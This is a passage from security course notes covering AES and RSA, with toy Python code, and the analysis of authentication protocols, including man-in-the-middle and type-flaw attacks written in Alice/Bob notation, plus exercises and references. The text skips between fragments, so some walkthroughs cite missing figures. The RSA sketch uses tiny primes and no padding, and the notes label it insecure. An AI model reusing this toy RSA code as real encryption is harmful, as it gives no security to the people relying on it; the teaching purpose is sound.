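    return [mul(col[0], row[0]) ^ mul(col[1], row[1]) ^
            mul(col[2], row[2]) ^ mul(col[3], row[3])
            for row in MIX]

assert mix_column([0xDB, 0x13, 0x53, 0x45]) == [0x8E, 0x4D, 0xA1, 0xBC]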
The basic functions are combined as follows: first a single AddRoundKey is
performed, then nine rounds of the sequence SubBytes, ShiftRows, MixColumns,
AddRoundKey, and a final tenth round which leaves out MixColumns, thus
performing SubBytes, ShiftRows, AddRoundKey.
Each AES operation is invertible. Decryption simply inverts each encryption
step in the reverse order.
9.5.3 RSA
In 1978 Rivest, Shamir and Adleman were the first to publish a public key
system. Their RSA system works as follows:
Setup and key generation: Randomly choose two large prime numbers p, q
and compute the modulus n = p · q. Pick e and d such that ed = 1 mod ϕ(n),
where ϕ(n) = ϕ(p · q) = (p − 1) · (q − 1) (knowing p and q one can compute d
for a given e, e.g. by using the extended Euclidean algorithm). The public key
is (e, n) and the private key is (d, n). That is, e and the modulus n are made
public while d is kept secret.
Encryption A plaintext can be any number less than n. To encrypt a plain-
text P raise it to the power e (modulo n): C = P^e mod n.
Decryption To decrypt a cipher text C raise it to the power d (modulo n):
P = C^d mod n.
The way of choosing e and d guarantees that a^(ed) = a mod n for any a.
Thus decryption works because C^d = P^(ed) mod n = P mod n. The public
information (e and n) is not sufficient to find d, p, q or ϕ(n), and this is essential
as knowing any of these would allow (finding d and) decrypting messages.
The large prime numbers p and q are randomly chosen; an attacker should
not be able to guess them. They should be sufficiently large as should their
difference (|p − q|) to ensure factoring n is actually difficult. All users should
have their own, distinct modulus n. The public exponent e is typically chosen to
be a convenient value such as 3, 7 or 2^16 + 1, as this allows for efficient encryption
(and as we will give away this value anyway there is no need for it to be random).
The private key d on the other hand should be big (close in size to n) to prevent
it being guessed or derived efficiently from e and n.
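A toy-sized sketch (ours) of the whole scheme; the primes here are far too small to offer any security and no padding is applied, so this only illustrates the arithmetic:

from math import gcd

# Toy key generation (real p and q have hundreds of digits).
p, q = 61, 53
n = p * q                    # modulus, public
phi = (p - 1) * (q - 1)      # phi(n), must stay secret
e = 17                       # public exponent, must be coprime to phi(n)
assert gcd(e, phi) == 1
d = pow(e, -1, phi)          # private exponent: e*d = 1 mod phi(n)

P = 42                       # plaintext: any number smaller than n
C = pow(P, e, n)             # encryption: C = P^e mod n
assert pow(C, d, n) == P     # decryption: C^d mod n recovers P

# Swapping the roles of e and d gives a textbook signature:
signature = pow(P, d, n)          # 'decrypt' with the private key
assert pow(signature, e, n) == P  # anyone can verify with the public key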
As we are working modulo n there are up to n possible values. Thus if we
work in blocks as with symmetric ciphers, the maximum block size with RSA
is log_2(n) bits. There are several ways to represent blocks as numbers in
0, . . . , n − 1. Typically some form of padding is used, for example by forming
the most significant bits from a random salt, creating a randomized encryption.
The padding ensures that the numbers are not too small, which would give
several problems: if plaintext P is a small number then P^e may be smaller than
n (recall that e may be small) and thus we are doing normal integer arithmetic,
where taking an e-th root is easy, instead of modular calculations where such
an operation is hard.
Note that for RSA encrypting and decrypting are the same operation except
for the use of a different key and, as de = ed = 1 mod ϕ(n), we can reverse the
roles of the encryption and decryption key; first decrypting a message and then
encrypting it also results in the original message. With this we can also use RSA
to perform signing: by decrypting the message we want to sign we generate a
signature that anyone can check with the public key and that only the holder
of the secret key can create. (We typically sign hashes of messages rather than
the messages themselves. If you are interested see the reading material, Handbook
of Applied Cryptography [22, Chapter 1], for more on hashes.)
The structure of RSA encryption and decryption also gives several other
properties, for example that the encryption of the product of two messages is
the product of the encryptions (modulo n): E(m · m′, (e, n)) = E(m, (e, n)) ·
E(m′, (e, n)) mod n. Combined with the observation above this allows one
to create blind signatures, i.e. to have Alice sign Bob’s message without Alice
learning the message: Bob generates a random mask r, encrypts this mask with
Alice’s public key (e, n) and multiplies the message (modulo n) with the en-
crypted mask. The result, m · r^e mod n, is given to Alice to sign (decrypt). This
value does not reveal anything about m to Alice and by signing it she creates
the signature of m masked (i.e. multiplied) with r.
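A sketch (ours) of this blinding trick with the same kind of toy parameters; the last step, in which Bob removes the mask by multiplying with the inverse of r modulo n, turns the masked signature into a signature on m itself:

from math import gcd

# Toy RSA key pair for Alice (same construction as in the RSA sketch above).
p, q = 61, 53
n, phi = p * q, (p - 1) * (q - 1)
e = 17
d = pow(e, -1, phi)

m = 99                                  # Bob's message, to be signed blindly
r = 123                                 # Bob's random mask, invertible mod n
assert gcd(r, n) == 1
blinded = (m * pow(r, e, n)) % n        # Bob sends m * r^e mod n to Alice

blind_sig = pow(blinded, d, n)          # Alice signs (decrypts) without learning m
sig = (blind_sig * pow(r, -1, n)) % n   # Bob unmasks: (m^d * r) * r^(-1) = m^d mod n

assert sig == pow(m, d, n)              # a valid signature on m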
A first natural question to ask is: do such functions actually exist? The
perhaps surprising answer is that this is not known. A fundamental unanswered
question of complexity theory is whether P is equal to NP. Suppose that we
were to find a trapdoor function; then computing its inverse (by the attacker)
would be a problem that is not in P but is in NP, which would prove that P ̸= NP.
Computing the inverse is not allowed to be in P as it must be a hard problem for
the attacker. Yet computing this inverse is easy for the holder of the key, so a
non-deterministic algorithm could first ‘guess’ the secret and then perform the
same computations as the key holder.
Still, though no-one has proven the existence of trapdoor functions, many
candidates exist which have been studied extensively and for which no efficient
algorithm to compute the inverse is known. One example is factoring the prod-
uct of two primes: creating the product from the primes is easy while factoring a
(large) number is difficult. However, if you know one of the two primes, finding
the other is easy again.
9.7 Summary
The goal after this chapter is that you will have a good idea of the basics of
cryptography; know how symmetric and public key ciphers can be used and are
able to give examples of these ciphers. It should also be clear what ‘cipher X
is secure’ means in any given context and you should be able to check whether
this is the case for a given setting and scheme.
9.7.1 Literature
Suggested reading/viewing
2. Do block modes apply only to symmetric ciphers or are they also relevant
to asymmetric ciphers? Why?
3. What are the main benefits of padding with a random salt when using RSA?
4. Once again consider the online music store scenario of Exercise 6 in Chap-
ter 1. Enhance the requirements you extracted and the security design that
you made by considering the threats and techniques introduced in this chap-
ter. Indicate how you would apply the techniques, what trade-offs this
imposes and what effect they have on both the attacks as well as on the
goals of the legitimate actors in the system, and, if applicable, what new
goals/actors you need to introduce.
5. Decipher the following (English) text:
Ftq Husqzqdq oubtqd ue zaf hqdk eqogdq.
6. Suppose that amongst six people each pair wants to be able to communi-
cate securely without the others being able to eavesdrop.
(a) How many different keys will they need in total if they use a symmet-
ric encryption algorithm and how many if they use an asymmetric
encryption algorithm?
(b) How many keys does a person have to store secretly in both cases?
7. Four methods to encrypt multi-block messages are ‘Electronic Code Book’,
‘Cipher Block Chaining’, ‘Output Feedback’, and ‘Cipher Feedback’. (See
Figure 9.9.)
(c) Show that the uniform distribution over a domain of size 2^n has an
entropy of n. (This is the highest entropy that can be achieved on
this domain.)
9. The one-time pad makes a message indistinguishable from messages of
equal length. With letters (instead of bits) you can apply the one time
pad by adding the key to the message modulo 26.
(a) This looks a lot like the Vigenere cipher. Why does the analysis
method to attack that cipher not work here?
The encryption is secure no matter the amount of computational
power the attacker has available; even trying all possible keys will
not help the attacker:
(b) Find two keys such that ciphertext ‘AFIGHT’ decodes to ‘YESYES’
and ‘NONONO’.
The one-time pad is not very convenient in use; the key is as long as
the message and can only be used once.
(c) What happens if the key of a one-time pad is reused?
(d) Would it be possible to make an unconditionally secure cipher with
a shorter or reusable key? (Remember question 8.)
Chapter 10
Analysis of Security
Protocols
10.1 Introduction
A protocol is a ‘recipe’ for communication; it describes the sequence of messages
that the participants in the communication should send and earlier in the course
we have seen protocols working at different layers of the network stack. Here we
focus on so called security protocols, protocols that aim to provide secure com-
munication over an otherwise insecure channel. Here ‘secure’ can mean different
things. It could refer to confidentiality of the data exchanged, to proper authen-
tication of the parties involved and their messages, to a combination thereof,
etc. For Internet banking, for example, one would want both authentication
and confidentiality. Obviously the requests for transfers by the client need to
be authenticated but also the bank should be properly authenticated before you
enter your login information so this information does not get stolen (for example
by a phishing attack) and misused. Confidentiality is needed to protect the
privacy of the client (as well as to keep the login information secret).
Figure 10.1: A login page over HTTPS with some security goals.
In earlier chapters we have seen mechanisms that can help achieve the goals
of security protocols; symmetric encryption, digital signatures, etc. Engineering
a good security protocol requires combining these methods in a way such that all
desired security properties are achieved. In this chapter we will look at how to
analyse security protocols which, as cryptography plays a large role in achieving
the security properties of protocols, are also often referred to as cryptographic
protocols.
SSH Another commonly used security protocol is Secure Shell (SSH) which is
used to remotely log onto a server. It is a transport layer protocol that supports
tunneling, in which traffic for e.g. X11 (graphical interface) connections can be
forwarded over the secure SSH connection. SCP for securely copying files and
SFTP, a secure alternative for FTP (File Transfer Protocol), also use SSH. SSH
supports password authentication of the client but also a public key can be used;
you place your public key on your account on the server. Your local SSH client
can then connect to the server by using your private key instead of you entering
a password. (You would likely want to protect your private key with a
password/passphrase, but that protects against attackers with access to your
machine rather than eavesdroppers on the network, i.e. a completely different
attacker model.)
External authentication (e.g. Kerberos, see below) is also possible.
1 TLS is basically a new version of SSL (Secure Sockets Layer). The names are often used
interchangeably.
Technically SSH is very similar to SSL/TLS and they achieve similar goals
(creating a secure channel between a client and a host). SSL is mostly used
for web traffic that needs to be secure, such as when transmitting valuable
information (e.g. a credit card number) over the internet, while SSH is often used
for securely executing commands remotely. SSL focuses on using certificates to
authenticate the server and does not do client authentication (though this can
be done over the created secure connection) while SSH has client authentication
built in. The main reason for having both protocols is historical.
Alice cannot decrypt the ticket {KAB, A, Texp}KBS as she does not have the
key KBS; only Bob and the server have this key. Yet she can forward the ticket
to Bob along with an extra message, {checksum, timestamp}KAB, which
confirms that she also knows KAB.
Note that once Alice and Bob share a key Bob can take the role of server
in a new run of the protocol. This occurs, for example, if Bob is the Ticket
Granting Service; Alice will contact server Bob to get a ticket for some other
service Charlie.
Kerberos can be used, not only within a single ‘realm’ (the services under
auspices of the authority which controls the authentication service) but also
across realms. (See Figure 10.3) A client in realm 1 wanting to use a service
in realm 2, will get a ticket for the authentication service of realm 2 from its
own authentication service. With that ticket it can then ask for a ticket of the
realm 2 service (which in turn may be the Ticket Granting Service for realm 2).
Suppose that Alice uses an online banking service Bob and a subscription
based joke-a-day service Mallory. Both services use our protocol for authen-
tication. When Alice authenticates to Mallory to get her joke of the day,
A→M :A
Mallory misuses this fact and will try to pretend to be Alice to Bob
M (A) → B : A
Bob sends his challenge back to ‘Mallory pretending to be Alice’ (or directly
to Alice depending on how the routing works; it does not matter as Mallory
can intercept all messages).
B → M (A) : {N }pk(A)
Mallory cannot decrypt the message … but she can forward it to Alice …
M → A : {N }pk(A)
Alice is waiting for a challenge from Mallory and will dutifully respond.
A → M : {N }pk(M )
Now this message Mallory can decrypt. She gets N and answers Bob’s
challenge.
M → B : {N }pk(B)
Now Mallory can empty Alice’s bank account and ‘the joke is at the expense
of Alice...’
With the definition in place we can return to our original question; is the
protocol correct, does it achieve authentication of Alice? Of course this question
is not yet complete; we have defined the security goals but we also need to give
the attacker model.
As the network is a dangerous place (see Chapter 8) we play it safe in
our attacker model and assume the worst case scenario in which the attacker,
we will call her Mallory, has full control over the network; she can intercept
all messages, block or change them, and create new messages. The attacker
may also have a valid identity (or even several) on the network with which she
can partake in protocol runs. However, we also need to assume some limits
on Mallory’s abilities. If she could also extract the nonce from the challenge
message {N }pk(A) without knowing Alice’s private key she can easily break
the authentication; she can send message A to Bob, intercept Bob's response,
extract the nonce N and return it to Bob. However, this is a problem with the
cryptography, and not with the protocol! We want to separate these concerns;
analyze the protocol without complicating matters too much with the details
of how the cryptography works. Thus in the protocol analysis we typically
assume that the cryptography simply works (the so called perfect cryptography
assumption).
Therefore our complete question becomes: Does the protocol achieve authen-
tication of Alice when the attacker has full control over the network but cannot
‘break the cryptography’? It may seem to work correctly at first glance; only
Alice can extract the nonce N from the message and, as it is fresh, when Bob
receives the nonce back he knows that Alice did this extraction after he sent
it. Thus Alice is alive and well and is answering the challenge. Yet what Bob
does not know is whether Alice is actually trying to authenticate to Bob. Per-
haps Mallory somehow tricked Alice into answering the challenge. The attack
in Figure 10.5 shows how Mallory might go about this.
The Man (Mallory) in the Middle attack (Figure 10.5) on our protocol works
as follows: Alice wants to authenticate to Mallory and when Alice sends her
authentication request to Mallory, Mallory sends one to Bob pretending to be
Alice in the protocol run with Bob. Bob will send a challenge to check whether
Mallory is actually Alice. Mallory cannot answer this challenge herself but can
forward it to Alice (pretending it came from Mallory herself). As Alice is waiting
for a challenge to come from Mallory (she is trying to authenticate to Mallory
after all), she will answer this challenge, decrypting the nonce and returning it
to Mallory encrypted with Mallory’s public key. In this way Mallory obtains
the nonce and can now answer the challenge from Bob by encrypting the nonce
with his public key.
Even in this simple example we managed to get it wrong. It seems to be
trickier than it looks. This is a general problem; even though protocols may
seem simple, it is easy to make mistakes.
“Security protocols are three line programs that people still manage
to get wrong.”
– Roger Needham –
We could try to fix the flaw, but how can we be sure that our fix works and
there are no further mistakes? Formal analysis, supported with automated ways
of checking models or proofs, can help to find mistakes. Formal analysis forces
you to be very precise in your assumptions and descriptions and automatically
checks (or even generates) the conclusions you can draw from them. It is im-
portant to remember that, as we also see with ‘provably secure cryptography’,
a formal proof is only as good as its input. If we make mistakes in modeling
the protocol and its context, or incorrect assumptions about how the protocol
is used, the attacker’s initial knowledge and capabilities, etc. a formally verified
protocol may still be vulnerable. Thus formal analysis is very useful and needs
to be done, but we should not blindly rely on its results.
A → M (B) : A
M (A) → B : A
B → M (A) : {N }pk(A)
M (B) → A : {N }pk(A)
A → M (B) : {N }pk(B)
M (A) → B : {N }pk(B)
Patched protocol and attempted attack. The message of Mallory does not
match the expectation of Alice so she does not advance the protocol; Mallory
does not learn N.
Patched protocol:
1. A → B : A
2. B → A : {N, B}pk(A)
3. A → B : {N}pk(B)
Attempted attack:
1. A → M : A
2. M(A) → B : A
3. B → M(A) : {N, B}pk(A)
4. M(A) → A : {N, B}pk(A)
5. A ̸→ M : (A was expecting {?, M}pk(A))
The adjustment makes the attack above impossible. But are there any other
attacks that are still possible? Ideally we would create a formal proof but this
is outside of the scope of this course; the master course Verification of Security
Protocols (2IF02) addresses this topic. Yet we can reason using the Dolev-Yao
model. An informal argument for correct authentication (of Alice to Bob) should
at least argue the following points:
1. A secret of Alice is used; a challenge that only Alice can answer ensures
that the attacker cannot complete the authentication without involving
Alice.
2. Freshness of Alice’s response; the secret has to be used in this session and
not be e.g. replayed from an earlier session.
3. Alice’s response is meant to authenticate her to Bob; when Alice is not
trying to authenticate to Bob it should not be possible to trick her into
answering the challenge for the attacker.
We addressed point 3 above by adding Bob’s name in the challenge that is
sent to Alice. But is this always sufficient to prevent Alice from being confused?
Let us consider another example protocol: the Otway-Rees Protocol for session
key distribution using a trusted server (see Figure 10.9). This protocol illustrates
a different method of authentication; via a trusted third party and also allows
us to illustrate another possible attack against protocols.
Otway-Rees and type flaw attacks The Otway-Rees protocol uses a trusted
server to create a short term session key (Kab) for communication between Al-
ice and Bob. Alice and Bob already share (long term) keys (Kas and Kbs
respectively) with the trusted server. The server is trusted in that we assume it
will behave correctly; generate good fresh random keys, not leak information to
the attacker (other than what is leaked by correctly following the protocol) nor
misuse the information it has. The server, for example, will know the key used
by Alice and Bob to communicate but this is not considered to be a problem.
Note that the protocol uses only symmetric cryptography. The key that people
share with the server is used to authenticate them rather than a public-private
key pair.
1. A → B : M s, A, B, {Na , M s, A, B}Kas
2. B → S : M s, A, B, {Na , M s, A, B}Kas , {Nb , M s, A, B}Kbs
3. S → B : M s, {Na , Kab}Kas , {Nb , Kab}Kbs
4. B → A : M s, {Na , Kab}Kas
that care needs to be taken to ensure that messages cannot be misused elsewhere
in the protocol.
Let us return to authentication but now both ways, i.e. mutual authentica-
tion. The Needham-Schroeder protocol is a well known protocol that has been
used for this purpose.
1. A → B : {A, Na }pk(B)
2. B → A : {Na , Nb }pk(A)
3. A → B : {Nb }pk(B)
2. B → A : {Na , Nb , B}pk(A)
The type flaw attack, shown in Figure 10.11, involves two type confusions.
The first is that Bob misinterprets M in message II.1 as a nonce. He responds
with message {M, Nb , B}pk(A) to prove he knows M , which he thinks is a nonce
from A, and adds his own nonce Nb as a challenge to A. Mallory cannot decrypt
this message, however, she can start a new session (III) with Alice and send
this message as the first message of this new session. Alice expects new sessions
from Mallory to start with a message of the form {M, ?} where ? is the challenge
(nonce) from M . She gets {M, Nb , B}. Thus, in a second type confusion, she
may interpret all of (Nb , B) to be the nonce from Mallory. Responding to
this challenge she sends {(Nb , B), Na′ , A}pk(M ) to prove she knows Mallory’s
challenge (Nb , B) and give her own challenge to Mallory (Na′ ). Now Mallory
can decrypt this message and extract everything including Nb . Knowing Nb she
can finally answer the challenge from Bob. Mallory has successfully pretended
to Alice and to Bob that she knows the ‘nonces’ (M and Nb ) that will be used
to build the key for this session.
Privacy Our authentication protocol design (e.g. Figure 10.8) introduces some
privacy concerns. First of all, Alice’s identity is sent in the clear. The protocol
aims to authenticate Alice only to Bob, not let everybody listening on the
network know that Alice wants to talk to Bob. For our protocol we can solve
this by encrypting Alice’s identity with Bob’s public key. Yet even then there is
a potential privacy issue: an attacker could determine whether Bob is willing to
talk to Alice. Anyone, including the attacker, can send the message {A}pk(B) .
Even though the attacker cannot answer the challenge from Bob, the very fact
that Bob sends a challenge is sufficient.
Bob is only willing to talk to some parties and only those parties should be
able to learn when he is willing to talk to them.
If Bob is not willing to create a session with Alice he sends a decoy response
(2′ ). Here K is any random key.
A possible solution to hide Bob’s choice is to always send a reply in such a way
that only Alice will be able to tell the difference. Abadi’s private authentication
protocol, see Figure 10.12, tries to achieve this. For this protocol to work the
decoy message should look real (be indistinguishable from a real message for
the attacker). Also the way we handle the decoy message should look real. For
example, if the decoy is easier to make than the real response and we respond
too quickly then the attacker may deduce the message is a decoy. (This is an
example of so-called side-channel information.)
Here we have mainly considered preventing Mallory on her own (so without
Alice being active) being able to tell whether Bob will talk to Alice. If Alice
herself connects to Bob, Mallory may be able to tell Bob’s choice by the fact that
Alice and Bob continue sending each other messages after the authentication
protocol completes. Preventing Bob’s choice from leaking in such situations
requires more advanced anonymization techniques.
Figure 10.13: Alice and Bob use a protocol for authenticating Bob (a) and Alice
wants to send secret messages to Bob (b); when Alice sends her secret, Mallory
can obtain it by using the other protocol.
Use of multiple protocols As a final aspect let us consider the use of mul-
tiple protocols. Two protocols that are by themselves correct may become vul-
nerable/flawed when combined. For example, a basic challenge-response protocol
using the public key of Bob is obviously flawed when combined with a protocol
that relies on the secrecy of messages encrypted with this public key (see
Figure 10.13). To address this we should analyse all protocols that
may be used together. Using different keys for different protocols would be one
way to avoid confusion of at least the encrypted parts of the messages between
protocols. The obvious drawback is that users need to have multiple keys.
10.4 Summary
It is hard to design a good protocol. Attacks such as man in the middle or type
flaw can break security goals of a protocol such as authentication and secrecy.
Very subtle flaws can have big consequences. This also makes the analysis of
protocols a difficult exercise. Analysis by formal methods is needed to provide
some degree of rigor.
10.4.1 Literature
Suggested reading The Spore repository contains many examples of proto-
cols and attacks against them. You do not need to know these protocols by heart
but should be able to understand a given protocol specification and analyse it
to find attacks.
• The Security Protocol Open Repository (Spore) [16].
4. Consider the man (Mallory) in the middle attack in Figure 10.5. Write
down the attacker knowledge in each step. Use a canonical form, i.e. write
only terms that cannot be decomposed any further by Mallory.
5. Consider again the online music store of the previous chapters. Review
your requirements analysis, adding security protocol considerations; threats
and countermeasures where appropriate.
6. Alice has a public key known to everyone. Bob knows a secret sB (e.g. a
password) that Alice will recognize as being Bob’s when she sees it (e.g.
because she has the hash of the password).
How could you fix the protocol for the properties above not yet achieved?
(a) A → B : A, K
[1] https://w2.eff.org/Privacy/Crypto/Crypto_misc/DESCracker/.
[2] M. Abadi. Security protocols and their properties. In NATO Science Series:
Volume for the 20th International Summer School on Foundations of Secure
Computation, pages 39–60, Marktoberdorf, Germany, 1999. http://www.
cse.ucsc.edu/~abadi/allpapers.html#marktoberdorftoo.
[5] S. Bellovin. Defending against sequence number attacks, 1996. IETF RFC
1948 http://www.ietf.org/rfc/rfc1948.txt.
[9] Sherman SM Chow, Joseph K Liu, Lucas CK Hui, and Siu Ming Yiu.
Provable Security: 8th International Conference, ProvSec 2014, Hong Kong,
China, October 9-10, 2014. Proceedings, volume 8782. Springer, 2014.
[11] R. J. Corin and J. I. den Hartog. A probabilistic Hoare-style logic for game-
based cryptographic proofs. In M. Bugliesi, B. Preneel, and V. Sassone,
editors, ICALP 2006 track C, Venice, Italy, volume 4052 of Lecture Notes
in Computer Science, pages 252–263, Berlin, July 2006. Springer-Verlag.
[13] Marcin Czenko, Sandro Etalle, Dongyi Li, and William H Winsborough.
An introduction to the role based trust management framework RT. In
Foundations of security analysis and design IV, pages 246–281. Springer,
2007. doc.utwente.nl/64136/1/IntroRTFinal.pdf.
[15] Golnaz Elahi and Eric S. K. Yu. A goal oriented approach for modeling
and analyzing security trade-offs. In ER, pages 375–390, 2007.
[18] J.I. den Hartog. Towards mechanized correctness proofs for cryptographic
algorithms: Axiomatization of a probabilistic Hoare style logic. Science of
Computer Programming, 74(1-2):52–63, 2008.
[19] Neal Koblitz and Alfred J. Menezes. Another look at “provable security”.
Journal of Cryptology, 20(1):3–37, 2007.
[22] Alfred J. Menezes, Paul C. van Oorschot, and Scott A. Vanstone. Handbook
of Applied Cryptography. CRC Press, 5th edition, 2001. http://cacr.
uwaterloo.ca/hac/.
[24] Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin
Szydlowski, Richard Kemmerer, Christopher Kruegel, and Giovanni Vigna.
Your botnet is my botnet: Analysis of a botnet takeover.
[25] F. Turkmen, J.I. den Hartog, S. Ranise, and N. Zannone. Analysis of XACML
policies with SMT. In 4th Conference on Principles of Security and Trust
(POST 2015), 2015. to appear.
[26] F. Turkmen, J.I. den Hartog, and N. Zannone. Poster: Analyzing access
control policies with SMT. In Proceedings of the 21st ACM Conference on
Computer and Communications Security (CCS 2014). ACM, 2014.